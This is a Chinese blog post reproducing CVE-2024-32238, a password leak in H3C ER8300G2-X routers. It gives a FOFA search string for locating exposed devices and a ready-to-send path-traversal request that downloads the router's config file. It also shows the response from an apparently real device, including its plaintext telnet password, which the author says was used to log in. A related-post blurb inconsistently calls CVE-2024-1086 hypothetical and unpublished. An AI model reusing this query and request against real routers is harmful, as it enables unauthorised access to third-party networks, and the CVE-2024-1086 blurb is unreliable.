CVE-2024-32238 漏洞复现 poc

于 2024-10-03 19:13:25 发布
阅读量141 收藏
点赞数 5
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86352963/article/details/142694663
版权

免责声明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞名称

H3C ER8300G2-X-密码泄露漏洞

影响版本

版本不详

漏洞描述

H3C ER8300G2-X易受不正确访问控制的影响。路由器管理系统的密码可以通过管理系统页面登录界面访问。

fofa语句

app="H3C-Ent-Router" && title=="ER8300G2-X系统管理"

漏洞复现

发送以下数据包

GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; CrOS aarch64 15236.9.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

响应包

HTTP/1.0 200 OK
Date: Thu Oct  3 18:45:50 2024
Server: H3C-Miniware-Webs
Last-modified: Thu Oct  3 18:45:50 2024
Content-length: 157121
Content-type: application/x-unknown;charset=GB2312

881250c4e970962729fb6758a04381dd  
ER8300G2-X/ERHMG2V100D022
$sys
@base
#
	if-type=root
	ifname=root
	name=H3C
	passwd=
#
	auxidletimeout=300
	auxauthmode=password
#1
	vtyname=ttyp0
	vtypasswd=lpx598662
	vtyidletimeout=300
	vtypasswdtype=simple
	vtyauthmode=password
#2
	vtyname=ttyp1
	vtypasswd=lpx598662
	vtyidletimeout=300
	vtypasswdtype=simple
	vtyauthmode=password
@lanctrl
#
	lanctrl-start-ip=0.0.0.0
	lanctrl-end-ip=255.255.255.255
@telnet
#

其中vtypasswd=lpx598662是密码

登录

漏洞复现成功

修复建议

升级到最新版本

Y苏世
关注
网康科技 NS-ASG 应用安全网关 SQL注入漏洞复现(CVE-2024-3458、CVE-2024-3457、CVE-2024-3456、CVE-2024-3455)
0xSec
04-13 832
网康科技 NS-ASG 应用安全网关 add_ikev2.php、config_ISCGroupNoCache.php、add_postlogin.php、config_Anticrack.php等接口处存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
福建科立讯通信 指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621、CVE-2024-2622、CVE-2024-2566)
0xSec
03-22 1063
福建科立讯通信指挥调度管理平台 down_file.php、pwd_update.php、editemedia.php、get_extension_yl.php、get_extension_yl.php等接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
CVE-2024-34351 漏洞复现
Jay17的博客
07-10 787
CVE-2024-34351 漏洞复现
CVE-2024-23334 AIOHTTP 目录遍历漏洞复现
shelter1234567的博客
03-04 1445
aiohttp是一个基于 asyncio 实现的 Python HTTP 客户端和服务器框架。它提供了异步的 HTTP 客户端和服务器功能,能够处理高并发的网络请求。以下是关于aiohttp基于 asyncioaiohttp是基于 Python 的 asyncio 模块开发的,因此它利用了 Python 3.5+ 中引入的异步编程能力,支持异步 I/O 操作。HTTP 客户端aiohttp提供了一个强大的异步 HTTP 客户端,可以发送 HTTP 请求并处理响应。
Spring RCE(CVE-2022-22965)漏洞复现POC
午夜安全
04-18 2665
漏洞编号 CVE-2022-22965 影响范围 受影响范围 Spring Framework < 5.3.18 Spring Framework < 5.2.20 及其衍生产品,且JDK>=9。 漏洞描述 Spring framework 是Spring 里面的一个基础开源框架,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux
CVE-2024-2961复现
kjdfklha的博客
06-04 1591
glibc中iconv()有一个字节溢出,用于转换编码,将一些数据转换成ISO-2022-CN-EXT时会有单字节溢出。// hexdump 函数的实现int i;for (i = 0;i < buflen;i++) {char input[0x10] = "AAAAA劄";作为一个web狗,会一点pwn、reverse很正常得对吧?iconv源码分析在译文中有,有兴趣自行查阅。php底层是通过C实现的,CTF技巧中常见的。
CVE-2024-36401:GeoServer远程代码执行漏洞复现 [附POC]
薛定谔嘚喵博客
07-08 3464
GeoServer是一个开源服务器,允许用户共享和编辑地理空间数据。在版本2.23.6、2.24.4和2.25.2之前存在一个远程代码执行漏洞,该漏洞源于GeoServer 调用的 GeoTools 库 API 评估要素类型的属性/属性名称,从而不安全地将它们传递给 commons-jxpath 库,该库在评估 XPath 表达式时可以执行任意代码。该漏洞允许未经身份验证的用户通过针对默认GeoServer安装的特制输入进行远程代码执行。
漏洞复现】Bazaar CVE-2024-40348 任意文件读取漏洞
weixin_54799594的博客
07-31 1677
漏洞复现过程记录
CVE-2020-1957 漏洞复现
huohaowen的博客
06-19 473
在一开始翻阅了CSDN之后,发现不同文章之间存在出入,于是最后去了CVE的官方文档,和参考一些国外的底层代码审计人员的报告,发现原理和CSDN上的部分文章存在出入,但是POC是相同的。在新版本的Shiro中GetRequestURL是由contextPath()+ servletPath()+ pathinfo() 这三个函数组合而成,当黑客传入。POC之后,在Shiro的过滤之下,返回的路径将会变成/admin/成功匹配,不会放行,成功防止了权限的绕过。然后我们用我们的POC去访问,成功绕过身份验证。
Windows CSC 服务特权提升漏洞复现CVE-2024-26229)
柠檬i的博客
06-18 651
Windows CSC服务特权提升漏洞。 当程序向缓冲区写入的数据超出其处理能力时,就会发生基于堆的缓冲区溢出,从而导致多余的数据溢出到相邻的内存区域。这种溢出会损坏内存,并可能使攻击者能够执行任意代码或未经授权访问系统。本质上,攻击者可以编写触发溢出的恶意代码或输入,从而控制受影响的系统、执行任意命令、安装恶意软件或访问敏感数据。 微软已发出警告成功利用此漏洞的攻击者可以获得 SYSTEM 权限,这是 Windows 系统上的最高访问级别。这增加了与 CVE-2024-26229 相关的风险,使其成为恶意
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 746
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 1164
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 691
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 1274
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
安全服务面试
m0_74402888的博客
09-28 605
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
网络编程(5)——模拟伪闭包实现连接的安全回收
m0_63086198的博客
09-26 1162
new_session通过bind绑定时,new_session的计数就会加一,所以在bind后,new_session的生命周期和新构造函数的生命周期相同,因为新生成的函数对象引用了new_session(new_session通过值传递的方式被复制构造函数使用)。,但是通过bind操作,将new_session作为数值传递给bind函数,而bind函数返回的函数对象内部引用了该new_session所以引用计数增加1,这样保证了new_session不会被释放。今天学习如何通过C11智能指针构造伪。
内核CVE-2024-1086漏洞复现脚本
06-19
CVE-2024-1086是一个假设的漏洞编号,因为到目前为止,2024年的CVEs尚未公开,且具体的CVE-2024-1086漏洞详情并未公开。通常情况下,内核漏洞复现脚本是非常复杂的,因为它涉及到Linux内核源代码的深入理解和可能的特定攻击向量。这些脚本可能包括以下步骤: 1. **获取源代码**:首先,你需要从Linux内核的官方git仓库或稳定版本下载相关的内核源代码。 2. **定位漏洞**:查找CVE描述中的相应部分,这通常在`Documentation/`目录下的`security/`或`kernel/`文件夹中。 3. **理解漏洞原理**:阅读漏洞分析报告、补丁和内核代码,理解漏洞是如何利用的。 4. **编写Poc(Proof of Concept)**:根据漏洞原理编写一个简单的程序或脚本来模拟攻击条件。 5. **执行复现**:在构建好的内核环境中运行这个Poc,看是否能触发预期的漏洞行为。 由于这是理论情况,并且实际的漏洞复现脚本通常不会公开,因为它们可能被用于恶意目的,所以你可能需要查阅官方安全公告、安全研究者发布的详细指南或者等待官方补丁发布后才能获得更多信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值